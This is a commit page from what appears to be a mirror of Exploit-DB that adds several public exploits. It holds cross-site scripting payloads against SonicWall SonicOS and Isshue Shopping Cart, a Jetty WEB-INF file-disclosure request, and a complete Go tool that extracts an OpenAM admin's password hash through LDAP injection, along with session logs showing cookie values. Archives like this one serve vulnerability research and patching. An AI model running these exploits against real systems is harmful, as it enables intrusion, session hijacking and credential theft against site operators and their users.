bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2021-11-04

Browse source 
17 changes to exploits/shellcodes

RDP Manager 4.9.9.3 - Denial-of-Service (PoC)
PHPJabbers Simple CMS 5 - 'name' Persistent Cross-Site Scripting (XSS)
WordPress Plugin Hotel Listing 3 - 'Multiple' Cross-Site Scripting (XSS)
Fuel CMS 1.4.1 - Remote Code Execution (3)
Eclipse Jetty 11.0.5 - Sensitive File Disclosure
WordPress Plugin Popup Anything 2.0.3 - 'Multiple' Stored Cross-Site Scripting (XSS)
OpenAM 13.0 - LDAP Injection
Simplephpscripts Simple CMS 2.1 - 'Multiple' Stored Cross-Site Scripting (XSS)
Simplephpscripts Simple CMS 2.1 - 'Multiple' SQL Injection
Sonicwall SonicOS 6.5.4 - 'Common Name' Cross-Site Scripting (XSS)
PHP Melody 3.0 - 'Multiple' Cross-Site Scripting (XSS)
PHP Melody 3.0 - 'vid' SQL Injection
Mult-e-Cart Ultimate 2.4 - 'id' SQL Injection
PHP Melody 3.0 - Persistent Cross-Site Scripting (XSS)
Isshue Shopping Cart 3.5 - 'Title' Cross Site Scripting (XSS)
Vanguard 2.1 - 'Search' Cross-Site Scripting (XSS)
Ultimate POS 4.4 - 'name' Cross-Site Scripting (XSS)
This commit is contained in:
Offensive Security 2021-11-04 05:02:12 +00:00
parent 7e3fa43161
commit 6829e7f3b7
18 changed files with 3520 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

245
exploits/hardware/webapps/50485.txt Normal file
View file

@ -0,0 +1,245 @@
# Exploit Title: Sonicwall SonicOS 6.5.4 - 'Common Name' Cross-Site Scripting (XSS)
# Date: 2021-10-18
# Exploit Author: Vulnerability Lab
# Vendor Homepage: https://www.sonicguard.com/NSV-800.asp
# Version: 6.5.4
Document Title:
===============
Sonicwall SonicOS 6.5.4 - Cross Site Scripting Web Vulnerability
References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2272
Release Date:
=============
2021-10-18
Vulnerability Laboratory ID (VL-ID):
====================================
2272
Common Vulnerability Scoring System:
====================================
5
Vulnerability Class:
====================
Cross Site Scripting - Non Persistent
Current Estimated Price:
========================
500€ - 1.000€
Product & Service Introduction:
===============================
The design, implementation and deployment of modern network architectures, such as virtualization and cloud, continue to be a game-changing
strategy for many organizations. Virtualizing the data center, migrating to the cloud, or a combination of both, demonstrates significant
operational and economic advantages. However, vulnerabilities within virtual environments are well-documented. New vulnerabilities are
discovered regularly that yield serious security implications and challenges. To ensure applications and services are delivered safely,
efficiently and in a scalable manner, while still combating threats harmful to all parts of the virtual framework including virtual
machines (VMs), application workloads and data must be among the top priorities.
(Copy of the Homepage: https://www.sonicguard.com/NSV-800.asp )
Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered a non-persistent cross site scripting web vulnerability in the SonicWall SonicOS 6.5.4.
Affected Product(s):
====================
Model: SonicWall SonicOS
Firmware: 6.5.4.4-44v-21-1288-aa5b8b01 (6.5.4)
OS: SonicOS Enhanced
Vulnerability Disclosure Timeline:
==================================
2021-07-24: Researcher Notification & Coordination (Security Researcher)
2021-07-25: Vendor Notification (Security Department)
2021-**-**: Vendor Response/Feedback (Security Department)
2021-**-**: Vendor Fix/Patch (Service Developer Team)
2021-**-**: Security Acknowledgements (Security Department)
2021-10-18: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Medium
Authentication Type:
====================
Restricted Authentication (Guest Privileges)
User Interaction:
=================
Medium User Interaction
Disclosure Type:
================
Responsible Disclosure
Technical Details & Description:
================================
A client-side input validation vulnerability has been discovered in the official SonicWall SonicOS 6.5.4.
The vulnerability allows remote attackers to hijack sessionc credentials or manipulate client-side requested application content.
The vulnerability is located in the common name input field in the Decryption Service - Common Name - Show Connection Failures module.
Remote attackers with low privileged user accounts can inject own script codes to compromise session credentials. It is also possible
to build special crafted html pages with get / post method requests to hijack non-expired user account sessions. The request method to
inject is get and the attack vector is located on the client-side without being persistent.
Successful exploitation of the vulnerability allows remote attackers to hijack session credentials (non-persistent), phishing
(non-persistent), external redirect to malicious sources (non-persistent) or client-side application content manipulation.
Exploitation of the vulnerability requires low or medium user interaction or a low privileged (restricted) user account.
Module(s):
[+] Decryption Service
Vulnerable Function(s):
[+] Edit (Bearbeiten)
Vulnerable Parameter(s):
[+] Common Name
Affected Module(s):
[+] Show Connection Failures
Proof of Concept (PoC):
=======================
The client-side cross site scripting web vulnerability can be exploited by remote attackers with user interaction.
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.
Manual steps to reproduce the vulnerability ...
1. Login as restricted or privileged user to the sonicWall sonicOS 6.5.4 virtual firewall application
2. Open the Decryption Service > Common Name > Show Connection Failures
3. Click on Edit and inject a js test payload into the restricted client content
4. Pushing anywhere else outsite field will temporarily save the payload
5. The script code immediately executes in the web browsers context
5. Successful reproduce of the script code inject web vulnerability!
Vulnerable Source: Connection Failure List (getConnFailureList.json)
<div id="connFailureEntriesDiv" style="overflow-y: scroll; height: 544px;">
<table summary="" width="100%" cellspacing="0" cellpadding="4" border="0">
<tbody id="connFailureEntries"><tr><td class="listItem" width="5%"><input type="checkbox"
id="failChk4181252134" class="failChk" data-id="4181251300" data-name="sfPKI-4411CA162CD7931145552C4C87F9603D55FC.22"
data-override-name="><iframe src=evil.source onload=alert(document.domain)>" data-failure="7" onclick="onClickFailCheckbox(this);"></td>
<td class="listItem" width="15%">192.168.XX.XX</td><td class="listItem" width="15%">XX.XX.XX.XX</td>
<td class="listItem" width="30%">>"<iframe src="evil.source" onload="alert(document.domain)"></iframe></td>
--- PoC Session Logs (Cookie: SessId=F0FF65AA4C2B22B0655546584DCFAF65) ---
https://nsv800.localhost:9281/evil.source
Host: nsv800.localhost:9281
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://nsv800.localhost:9281/sslSpyConfigure.html
Cookie: temp=; SessId=F0FF65AA4C2B22B0655546584DCFAF65
Upgrade-Insecure-Requests: 1
-
GET: HTTP/1.0 200 OK
Server: SonicWALL
Content-type: text/html;charset=UTF-8
-
https://nnsv800.localhost:9281/getJsonData.json?dataSet=alertStatus&_=1625248460727
Host: nsv800.localhost:9281
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
X-Requested-With: XMLHttpRequest
Connection: keep-alive
Referer: https://nsv800.localhost:9281/logo.html
Cookie: temp=; SessId=F0FF65AA4C2B22B0655546584DCFAF65
-
GET: HTTP/1.0 200 OK
Server: SonicWALL
Content-type: application/json
Accept-Ranges: bytes
Reference(s):
nsv800.localhost:9281/main.html
nsv800.localhost:9281/getJsonData.json
nsv800.localhost:9281/sslSpyConfigure.html
Solution - Fix & Patch:
=======================
The vulnerability can be patched by a secure parse and encode of the client-side reflected script code through getJsonData.json and sslSpyConfigure.
The input and output parameters needs to be sanitized to prevent script code injects.
Security Risk:
==============
The security risk of the client-side cross site web vulnerability in the sonicwall sonicos series is estimated as medium.
Credits & Authors:
==================
Vulnerability-Lab [Research Team] - https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab
or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits
or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do
not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.
We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.
Domains: www.vulnerability-lab.com www.vuln-lab.com www.vulnerability-db.com
Services: magazine.vulnerability-lab.com paste.vulnerability-db.com infosec.vulnerability-db.com
Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php vulnerability-lab.com/rss/rss_upcoming.php vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php vulnerability-lab.com/register.php vulnerability-lab.com/list-of-bug-bounty-programs.php
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other
information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or
edit our material contact (admin@ or research@) to get a ask permission.
Copyright © 2021 | Vulnerability Laboratory - [Evolution Security GmbH]™
--
VULNERABILITY LABORATORY (VULNERABILITY LAB)
RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE
LUDWIG-ERHARD STRAßE 4
34131 KASSEL - HESSEN
DEUTSCHLAND (DE)

41
exploits/java/webapps/50478.txt Normal file
View file

@ -0,0 +1,41 @@
# Exploit Title: Eclipse Jetty 11.0.5 - Sensitive File Disclosure
# Date: 2021-11-03
# Exploit Author: Mayank Deshmukh
# Vendor Homepage: https://www.eclipse.org/jetty/
# Software Link: https://repo1.maven.org/maven2/org/eclipse/jetty/jetty-distribution/
# Version: 9.4.37 ≤ version < 9.4.43, 10.0.1 ≤ version < 10.0.6, 11.0.1 ≤ version < 11.0.6
# Security Advisory: https://github.com/eclipse/jetty.project/security/advisories/GHSA-vjv5-gp2w-65vm
# Tested on: Kali Linux
# CVE : CVE-2021-34429
# Github POC: https://github.com/ColdFusionX/CVE-2021-34429
POC - Access WEB-INF/web.xml
## Request
GET /%u002e/WEB-INF/web.xml HTTP/1.1
Host: localhost:9006
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
## Response
HTTP/1.1 200 OK
Connection: close
Last-Modified: Wed, 03 Nov 2021 08:25:24 GMT
Content-Type: application/xml
Accept-Ranges: bytes
Content-Length: 209
Server: Jetty(11.0.5)
<!DOCTYPE web-app PUBLIC
"-//Sun Microsystems, Inc.//DTD Web Application 2.3//EN"
"http://java.sun.com/dtd/web-app_2_3.dtd" >
<web-app>
<display-name>ColdFusionX - Web Application</display-name>
</web-app>

253
exploits/java/webapps/50480.go Executable file
View file

@ -0,0 +1,253 @@
# Exploit Title: OpenAM 13.0 - LDAP Injection
# Date: 03/11/2021
# Exploit Author: Charlton Trezevant, GuidePoint Security
# Vendor Homepage: https://www.forgerock.com/
# Software Link: https://github.com/OpenIdentityPlatform/OpenAM/releases/tag/13.0.0,
# https://backstage.forgerock.com/docs/openam/13/install-guide/index.html#deploy-openam
# Version: OpenAM v13.0.0
# Tested on: go1.17.2 darwin/amd64
# CVE: CVE-2021-29156
#
# This vulnerability allows an attacker to extract a variety of information
# (such as a users password hash) from vulnerable OpenAM servers via LDAP
# injection, using a character-by-character brute force attack.
#
# https://github.com/guidepointsecurity/CVE-2021-29156
# https://nvd.nist.gov/vuln/detail/CVE-2021-29156
# https://portswigger.net/research/hidden-oauth-attack-vectors
package main
// All of these dependencies are included in the standard library.
import (
"container/ring"
"fmt"
"math/rand"
"net/http"
"net/url"
"sync"
"time"
)
func main() {
// Base URL of the target OpenAM instance
baseURL := "http://localhost/openam/"
// Local proxy (such as Burp)
proxy := "http://localhost:8080/"
// Username whose hash should be dumped
user := "amAdmin"
// Configurable ratelimit
// This script can go very, very fast. But it's likely that would overload Burp and the target server.
// The default ratelimit of 6 can retrieve a 60 character hash through a proxy in about 5 minutes and
// ~1700 requests.
rateLimit := 6
// Beginning of the LDAP injection payload. %s denotes the position of the username.
payloadUsername := fmt.Sprintf(".well-known/webfinger?resource=http://x/%s)", user)
partURL := fmt.Sprintf("%s%s", baseURL, payloadUsername)
// Your LDAP injection payloads. %s denotes the position at which the constructed hash + next test character
// will be inserted.
// These are configured to dump password hashes. But you can reconfigure them to dump other data, such as
// usernames/session IDs/etc depending on your use case.
// N.B. you will likely need to update the brute-forcing keyspace depending on the data you're trying to dump.
testCharPayload := "(sunKeyValue=userPassword=%s*)(%%2526&rel=http://openid.net/specs/connect/1.0/issuer"
testCrackedPayload := "(sunKeyValue=userPassword=%s)(%%2526&rel=http://openid.net/specs/connect/1.0/issuer"
// The keyspace for brute-forcing individual characters is stored in a ringbuffer
// You may need to change how this is initialized depending on the types of data you're
// trying to retrieve. By default, this is configured for password hashes.
dict := makeRing()
// Working characters for each step are concatenated with this string. Further tests are conducted
// using this value as it's built.
// Importantly, if you already have part of the hash you can put it here as a crib. This allows you
// to resume a previous brute-forcing session.
password := ""
proxyURL, _ := url.Parse(proxy)
// You can modify the HTTP client configuration below.
// For example, to disable the HTTP proxy or set a different
// request timeout value.
client := &http.Client{
Transport: &http.Transport{
Proxy: http.ProxyURL(proxyURL),
},
Timeout: 30 * time.Second,
}
// Channels used for internal signaling
cracked := make(chan string, 1)
foundChar := make(chan string, 1)
wg := &sync.WaitGroup{}
wg.Add(1)
// All hacking tools need a header. You may experience a 10-15x performance improvement
// if you replace the flower-covered header with the gothic bleeding/flaming/skull-covered
// ASCII art typical of these kinds of tools.
printHeader()
loop:
for {
select {
case <-cracked:
// Full hash test succeeds, terminate everything
// N.B. this feature does not work, see my comments on checkCracked.
fmt.Printf("Cracked! Password hash is: \"%s\"\n", password)
wg.Done()
break loop
case char := <-foundChar:
// In the event that a test character succeeds, that thread will pass it along in the
// foundChar channel to signal success. It's then concatenated with the known-good
// password hash and the whole thing is tested in a query
// This doesn't work because OpenAM doesn't respond to direct queries containing the password hash
// in the manner I expect. But it might still work for other types of data.
password += char
fmt.Printf("Progress so far: '%s'\n", password)
// Forgive these very ugly closures
go (func(client *http.Client, url, payload *string, password string, cracked *chan string) {
// Add random jitter before submitting request
time.Sleep(time.Duration(rand.Intn(3)+3) * time.Microsecond)
time.Sleep(1 * time.Second)
checkCracked(client, url, payload, &password, cracked)
})(client, &partURL, &testCharPayload, password, &cracked)
default:
for i := 0; i < rateLimit-1; i++ {
testChar := dict.Value.(string)
go (func(client *http.Client, url, payload *string, password, testChar string, foundChar *chan string) {
time.Sleep(time.Duration(rand.Intn(3)+3) * time.Microsecond)
time.Sleep(1 * time.Second)
getChar(client, url, payload, &password, &testChar, foundChar)
})(client, &partURL, &testCrackedPayload, password, testChar, &foundChar)
dict = dict.Next()
}
time.Sleep(1 * time.Second)
}
}
wg.Wait()
}
// checkCracked tests a complete string in a query against the OpenAM server to
// determine whether the exact, full hash has been retrieved.
// This doesn't actually work, because the server doesn't respond as I'd expect
// A better implementation would probably watch until all positions in the ringbuffer
// are exhausted in testing and terminate (since there's no way to progress further)
func checkCracked(client *http.Client, targetURL, payload, password *string, cracked *chan string) {
fullPayload := fmt.Sprintf(*payload, url.QueryEscape(*password))
fullURL := fmt.Sprintf("%s%s", *targetURL, fullPayload)
req, err := http.NewRequest("GET", fullURL, nil)
if err != nil {
fmt.Printf("checkCracked: %s", err.Error())
return
}
res, err := client.Do(req)
if err != nil {
fmt.Printf("checkCracked: %s", err.Error())
return
}
if res.StatusCode == 200 {
*cracked <- *password
return
}
if res.StatusCode == 404 {
return
}
fmt.Printf("checkCracked: got status code of %d for payload %s", res.StatusCode, payload)
}
// getChar tests a given character at the end position of the configured payload and dumped hash progress.
func getChar(client *http.Client, targetURL, payload, password, testChar *string, foundChar *chan string) {
// Concatenate test character -> password -> payload -> attack URL
combinedPass := url.QueryEscape(fmt.Sprintf("%s%s", *password, *testChar))
fullPayload := fmt.Sprintf(*payload, combinedPass)
fullURL := fmt.Sprintf("%s%s", *targetURL, fullPayload)
req, err := http.NewRequest("GET", fullURL, nil)
if err != nil {
fmt.Printf("getChar: %s", err.Error())
return
}
res, err := client.Do(req)
if err != nil {
fmt.Printf("getChar: %s", err.Error())
return
}
if res.StatusCode == 200 {
*foundChar <- *testChar
return
}
if res.StatusCode == 404 {
return
}
fmt.Printf("getChar: got status code of %d for payload %s", res.StatusCode, payload)
}
// makeRing instantiates a ringbuffer and initializes it with test characters common in base64
// and password hash encodings.
// Bruteforcing on a character-by-character basis can only go as far as your dictionary will take
// you, so be sure to update these strings if the keyspace for your use case is different.
func makeRing() *ring.Ring {
var upcase string = `ABCDEFGHIJKLMNOPQRSTUVWXYZ`
var lcase string = `abcdefghijklmnopqrstuvwxyz`
var num string = `1234567890`
var punct string = `$+/.=`
var dictionary string = upcase + lcase + num + punct
buf := ring.New(len(dictionary))
for _, c := range dictionary {
buf.Value = fmt.Sprintf("%c", c)
buf = buf.Next()
}
return buf
}
// printHeader is cool.
func printHeader() {
fmt.Printf(`
_______ ,---. ,---. .-''-.
/ __ \ | / | | .'_ _ \
| ,_/ \__)| | | .'/ ( ' ) '
,-./ ) | | _ | |. (_ o _) |
\ '_ '') | _( )_ || (_,_)___|
> (_) ) __\ (_ o._) /' \ .---.
( . .-'_/ )\ (_,_) / \ '-' /
'-''-' / \ / \ /
'._____.' '---' ''-..-'
.'''''-. .-'''''''-. .'''''-. ,---. .'''''-. .-''''-. ,---. ,--------. .------. .---.
/ ,-. \ / ,'''''''. \ / ,-. \ /_ | / ,-. \ / _ _ \ /_ | | _____| / .-. \ \ /
(___/ | ||/ .-./ ) \| (___/ | | ,_ | (___/ | || ( ' ) | ,_ | | ) / / '--' | |
.' / || \ '_ .')|| .' / ,-./ )| _ _ _ _ .' / | (_{;}_) |,-./ )| | '----. | .----. \ /
_.-'_.-' ||(_ (_) _)|| _.-'_.-' \ '_ '') ( ' )--( ' ) _.-'_.-' | (_,_) |\ '_ '')|_.._ _ '. | _ _ '. v
_/_ .' || / . \ || _/_ .' > (_) )(_{;}_)(_{;}_)_/_ .' \ | > (_) ) ( ' ) \| ( ' ) \ _ _
( ' )(__..--.|| '-''"' || ( ' )(__..--.( . .-' (_,_)--(_,_)( ' )(__..--. '----' |( . .-' _(_{;}_) || (_{;}_) |(_I_)
(_{;}_) |\'._______.'/(_{;}_) | '-''-'| (_{;}_) | .--. / / '-''-'| | (_,_) / \ (_,_) /(_(=)_)
(_,_)-------' '._______.' (_,_)-------' '---' (_,_)-------' )_____.' '---' '...__..' '...__..' (_I_)
~ ~ (c) 2021 GuidePoint Security - charlton.trezevant@guidepointsecurity.com ~ ~
`)
}

231
exploits/multiple/webapps/50490.txt Normal file
View file

@ -0,0 +1,231 @@
# Exploit Title: Isshue Shopping Cart 3.5 - 'Title' Cross Site Scripting (XSS)
# Date: 2021-10-22
# Exploit Author: Vulnerability Lab
# Vendor Homepage: https://www.bdtask.com/multi-store-ecommerce-shopping-cart-software/
# Version: 3.5
Document Title:
===============
Isshue Shopping Cart v3.5 - Cross Site Web Vulnerability
References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2284
Release Date:
=============
2021-10-22
Vulnerability Laboratory ID (VL-ID):
====================================
2284
Common Vulnerability Scoring System:
====================================
5.1
Vulnerability Class:
====================
Cross Site Scripting - Persistent
Current Estimated Price:
========================
500€ - 1.000€
Product & Service Introduction:
===============================
Multi-store eCommerce shopping cart software is the complete solution for eCommerce business management. It is all in one package for website management
with backend admin panel to manage inventory, order, product, invoicing & so on. No need regular monthly subscription fee, get it through one-time payment now.
Your eCommerce business frequently changes with the times. All you need is a system that will make your work easier and time-saving. You need the best
eCommerce shopping cart software which is flexible, upgradable, affordable. Isshue is a completely secure and fast eCommerce POS system for eCommerce
solutions. Isshue is the best choice for any type of e-commerce business, big or small.
(Copy of the Homepage: https://www.bdtask.com/multi-store-ecommerce-shopping-cart-software/ )
Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered a persistent validation vulnerability in the Isshue eCommerce Shopping Cart v3.5 web-application.
Affected Product(s):
====================
bdtask
Product: Isshue Shopping Cart v3.5 - eCommerce (Web-Application)
Vulnerability Disclosure Timeline:
==================================
2021-08-23: Researcher Notification & Coordination (Security Researcher)
2021-08-24: Vendor Notification (Security Department)
2021-**-**: Vendor Response/Feedback (Security Department)
2021-**-**: Vendor Fix/Patch (Service Developer Team)
2021-**-**: Security Acknowledgements (Security Department)
2021-10-22: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Medium
Authentication Type:
====================
Restricted Authentication (Moderator Privileges)
User Interaction:
=================
Medium User Interaction
Disclosure Type:
================
Responsible Disclosure
Technical Details & Description:
================================
A persistent input validation web vulnerability has been discovered in the official Isshue eCommerce Shopping Cart v3.5 web-application.
The vulnerability allows remote attackers to inject own malicious script codes with persistent attack vector to compromise browser to
web-application requests from the application-side.
A input validation web vulnerability has been discovered in the title input fields in `new invoice`, `customer` & `stock` modules.
The `title` input and parameter allows to inject own malicious script code with persistent attack vector. The content of the input
and parameter is insecure validated, thus allows remote attackers with privileged user accounts (manager/keeper/admin) to inject
own malformed script code that executes on preview. The request method to inject is post and the attack vector is persistent on
the application-side.
Successful exploitation of the vulnerability results in session hijacking, persistent phishing attacks, persistent external redirects
to malicious source and persistent manipulation of affected application modules.
Request Method(s):
[+] POST
Vulnerable Module(s):
[+] Edit Title
Vulnerable Input(s):
[+] Title
Vulnerable Parameter(s):
[+] title
Affected Module(s):
[+] stock
[+] customer
[+] invoice
Proof of Concept (PoC):
=======================
The persistent input validation web vulnerability can be exploited by remote attackers with keeper account and with low user interaction.
For security demonstration or to reproduce the persistent cross site web vulnerability follow the provided information and steps below to continue.
Vulnerable Source:
<div class="row">
<div class="col-sm-12 lobipanel-parent-sortable ui-sortable" data-lobipanel-child-inner-id="azO1Fsrq9M">
<div class="panel panel-bd lobidrag lobipanel lobipanel-sortable" data-inner-id="azO1Fsrq9M" data-index="0">
<div class="panel-heading ui-sortable-handle">
<div class="panel-title" style="max-width: calc(100% - 180px);">"[MALICIOUS INJECTED SCRIPT CODE!]<iframe src="evil.source" onload="alert(document.cookie)"></iframe></div>
<div class="dropdown"><ul class="dropdown-menu dropdown-menu-right"><li><a data-func="editTitle" data-tooltip="Edit title"
data-toggle="tooltip" data-title="Edit title" data-placement="bottom" data-original-title="" title=""><i class="panel-control-icon ti-pencil"></i>
<span class="control-title">Edit title</span></a></li><li>
<a data-func="unpin" data-tooltip="Unpin" data-toggle="tooltip" data-title="Unpin" data-placement="bottom" data-original-title="" title="">
<i class="panel-control-icon ti-move"></i><span class="control-title">Unpin</span></a></li><li>
<a data-func="reload" data-tooltip="Reload" data-toggle="tooltip" data-title="Reload" data-placement="bottom" data-original-title="" title="">
<i class="panel-control-icon ti-reload"></i><span class="control-title">Reload</span></a></li><li>
<a data-func="minimize" data-tooltip="Minimize" data-toggle="tooltip" data-title="Minimize" data-placement="bottom" data-original-title="" title="">
<i class="panel-control-icon ti-minus"></i><span class="control-title">Minimize</span></a></li><li><a data-func="expand"
data-tooltip="Fullscreen" data-toggle="tooltip" data-title="Fullscreen" data-placement="bottom" data-original-title="" title="">
<i class="panel-control-icon ti-fullscreen"></i><span class="control-title">Fullscreen</span></a></li><li>
<a data-func="close" data-tooltip="Close" data-toggle="tooltip" data-title="Close" data-placement="bottom" data-original-title="" title="">
<i class="panel-control-icon ti-close"></i><span class="control-title">Close</span></a></li></ul>
<div class="dropdown-toggle" data-toggle="dropdown"><span class="panel-control-icon glyphicon glyphicon-cog"></span></div></div></div>
<form action="https://isshue.bdtask.com/isshue_v4_demo4/dashboard/Store_invoice/new_invoice" class="form-vertical" id="validate" name="insert_invoice" enctype="multipart/form-data" method="post" accept-charset="utf-8" novalidate="novalidate">
<div class="panel-body">
<div class="row">
<div class="col-sm-8" id="payment_from_1">
<div class="form-group row">
<label for="customer_name" class="col-sm-3 col-form-label">Customer Name <i class="text-danger">*</i></label>
<div class="col-sm-6">
<input type="text" size="100" value="a as" name="customer_name" class="customerSelection form-control ui-autocomplete-input" placeholder="Customer Name" id="customer_name" autocomplete="off">
<input id="SchoolHiddenId" value="HW77BA6CZEJXCV8" class="customer_hidden_value" type="hidden" name="customer_id">
</div>
--- PoC Session Logs (GET) [Execute] ---
https://isshue.localhost:8080/isshue/dashboard/Store_invoice/evil.source
Host: isshue.localhost:8080
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Connection: keep-alive
Referer: https://isshue.localhost:8080/isshue/dashboard/Store_invoice/new_invoice
Cookie: ci_session=f16fc8ac874d2fbefd4f1bc818e9361e563a9535; bm=29207327be4562a93104e7c7c2e62fe74d7d12de-
1629733189-1800-AStEmjkeD30sgtw0bgFOcvlrw7KiV79iVZGn+JuZ0bDjD7g99V69gfssqh4LvIWof7tjzmwNEeHHbVZcMib7hnkgJULvefbayRn8vBdfB73nFdoUChp8uXuiRxDu17LDBA==
-
GET: HTTP/2.0 200 OK
content-type: text/html; charset=UTF-8
vary: Accept-Encoding
set-cookie: cookie=f16fc8ac874d2fbefd4f1bc818e9361e563a9535; bm=29207327be4562a93104e7c7c2e62fe74d7d12de-
1629733189-1800-AStEmjkeD30sgtw0bgFOcvlrw7KiV79iVZGn+JuZ0bDjD7g99V69gfssqh4LvIWof7tjzmwNEeHHbVZcMib7hnkgJULvefbayRn8vBdfB73nFdoUChp8uXuiRxDu17LDBA==; GMT; Max-Age=7200; path=/
Security Risk:
==============
The security risk of the persistent input validation web vulnerability in the shopping cart web-application is estimated as medium.
Credits & Authors:
==================
Vulnerability-Lab [Research Team] - https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab
or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits
or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do
not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.
We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.
Domains: www.vulnerability-lab.com www.vuln-lab.com www.vulnerability-db.com
Services: magazine.vulnerability-lab.com paste.vulnerability-db.com infosec.vulnerability-db.com
Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php vulnerability-lab.com/rss/rss_upcoming.php vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php vulnerability-lab.com/register.php vulnerability-lab.com/list-of-bug-bounty-programs.php
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other
information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or
edit our material contact (admin@ or research@) to get a ask permission.
Copyright © 2021 | Vulnerability Laboratory - [Evolution Security GmbH]™
--
VULNERABILITY LABORATORY (VULNERABILITY LAB)
RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE
LUDWIG-ERHARD STRAßE 4
34131 KASSEL - HESSEN
DEUTSCHLAND (DE)

260
exploits/php/webapps/50475.txt Normal file
View file

@ -0,0 +1,260 @@
# Exploit Title: PHPJabbers Simple CMS 5 - 'name' Persistent Cross-Site Scripting (XSS)
# Google Dork: subtitle:Copyright © 2021 PHPJabbers.com
# Date: 2021-10-28
# Exploit Author: Vulnerability-Lab
# Vendor Homepage: https://www.phpjabbers.com/faq.php
# Software Link: https://www.phpjabbers.com/simple-cms/
# Version: v5
# Tested on: Linux
Document Title:
===============
PHPJabbers Simple CMS v5 - Persistent XSS Vulnerability
References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2300
Release Date:
=============
2021-10-28
Vulnerability Laboratory ID (VL-ID):
====================================
2300
Common Vulnerability Scoring System:
====================================
5.4
Vulnerability Class:
====================
Cross Site Scripting - Persistent
Current Estimated Price:
========================
500€ - 1.000€
Product & Service Introduction:
===============================
A simple PHP content management system for easy web content editing and publishing. Our PHP Content Management System script is designed
to provide you with powerful yet easy content administration tools. The smart CMS lets you create and manage multiple types of web sections
and easily embed them into your website. You can upload a wide range of files and add users with different user access levels. Get the
Developer License and customize the script to fit your specific needs.
(Copy of the Homepage:https://www.phpjabbers.com/simple-cms/ )
Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered a persistent input validation vulnerability in the PHPJabbers Simple CMS v5.0 web-application.
Affected Product(s):
====================
PHPJabbers
Product: PHPJabbers Simple CMS v5.0 - (Web-Application)
Vulnerability Disclosure Timeline:
==================================
2021-09-01: Researcher Notification & Coordination (Security Researcher)
2021-09-02: Vendor Notification (Security Department)
2021-**-**: Vendor Response/Feedback (Security Department)
2021-**-**: Vendor Fix/Patch (Service Developer Team)
2021-**-**: Security Acknowledgements (Security Department)
2021-10-28: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Medium
Authentication Type:
====================
Restricted Authentication (Moderator Privileges)
User Interaction:
=================
Low User Interaction
Disclosure Type:
================
Responsible Disclosure
Technical Details & Description:
================================
A persistent input validation web vulnerability has been discovered in the in the PHPJabbers Simple CMS v5.0 web-application.
